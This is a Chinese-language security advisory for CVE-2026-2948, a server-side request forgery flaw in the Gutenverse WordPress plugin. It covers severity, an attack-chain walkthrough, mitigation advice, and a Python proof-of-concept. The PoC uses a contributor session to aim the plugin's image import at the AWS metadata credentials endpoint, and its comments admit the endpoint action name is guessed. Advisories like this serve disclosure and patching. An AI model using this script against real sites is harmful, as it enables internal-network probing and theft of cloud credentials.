CVE-2026-2948 WordPress Gutenverse插件SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-2948

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem

漏洞概述

WordPress插件Gutenverse在3.5.3及之前版本中存在服务器端请求伪造（SSRF）漏洞。该漏洞源于`import_images()`函数未对用户输入的URL进行严格过滤与校验。具有贡献者及以上权限的认证攻击者可利用此漏洞，诱导Web服务器向任意内网或外网地址发起HTTP请求。攻击者借此可探测内网服务、读取敏感信息或结合其他漏洞对内部系统进行攻击，影响系统的机密性与完整性。

技术细节

该漏洞位于Gutenverse插件的图片导入功能中。当具有编辑权限（如Contributor）的用户调用`import_images()`函数时，插件会接收用户提交的图片URL参数并尝试从该地址获取图片。由于代码层面未对目标URL进行有效的协议限制或内网IP地址过滤（如未禁止访问127.0.0.1、169.254.x.x等内网地址），攻击者可以构造恶意请求，将URL参数指向内部敏感服务（如元数据服务、数据库管理端口、Redis等）。服务器在处理请求时，会将攻击者的Payload转发至目标内网地址，并将响应返回给攻击者。利用SSRF，攻击者不仅能绕过防火墙探测内网拓扑，还可能利用Gopher协议发送恶意指令，或在特定云环境中窃取实例元数据凭证，从而进一步控制服务器。

攻击链分析

STEP 1

1. 侦察阶段

攻击者识别目标站点安装了Gutenverse插件，且版本号小于等于3.5.3。

STEP 2

2. 获取权限

攻击者通过注册、社工或利用其他漏洞获取一个具有贡献者（Contributor）及以上权限的WordPress账户。

STEP 3

3. 构造载荷

攻击者构造包含恶意内部地址（如http://127.0.0.1/admin）的HTTP请求，指向插件的import_images接口。

STEP 4

4. 发起攻击

服务器端接收到请求后，未进行过滤便向攻击者指定的内部地址发起连接，并将响应内容返回。

STEP 5

5. 达成目的

攻击者根据返回的信息获取内网服务敏感数据，或利用该漏洞进一步攻击内网系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_ssrf(target_url, cookie, internal_url):
    """
    PoC for CVE-2026-2948
    Exploits SSRF in import_images function.
    """
    # The endpoint might be admin-ajax.php or a specific REST API route
    # Assuming admin-ajax.php based on typical WordPress plugin structure
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }
    
    # Payload data targeting the vulnerable function
    payload = {
        "action": "gutenverse_import_images", # Inferred action name
        "url": internal_url, # Malicious internal URL, e.g., http://127.0.0.1:80
        "nonce": "some_valid_nonce_if_required" # May need a valid WP nonce
    }
    
    try:
        response = requests.post(endpoint, data=payload, headers=headers, cookies=cookie, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent to internal URL: {internal_url}")
            print(f"[+] Response snippet: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://victim-wordpress-site.com"
    # Cookie for a user with Contributor role or higher
    auth_cookie = {"wordpress_logged_in_12345": "user_cookie_value"} 
    # Targeting internal metadata service (AWS example)
    malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" 
    exploit_ssrf(target, auth_cookie, malicious_url)

影响范围

Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem <= 3.5.3

防御指南

临时缓解措施

建议立即将Gutenverse插件升级至最新版本以修复漏洞。若无法立即升级，应严格限制后台用户权限，撤销非必要人员的编辑资格。同时，可在服务器端部署WAF规则，拦截包含内网IP段（如127.0.0.1、10.0.0.0/8等）的异常出站请求，防止SSRF攻击被利用。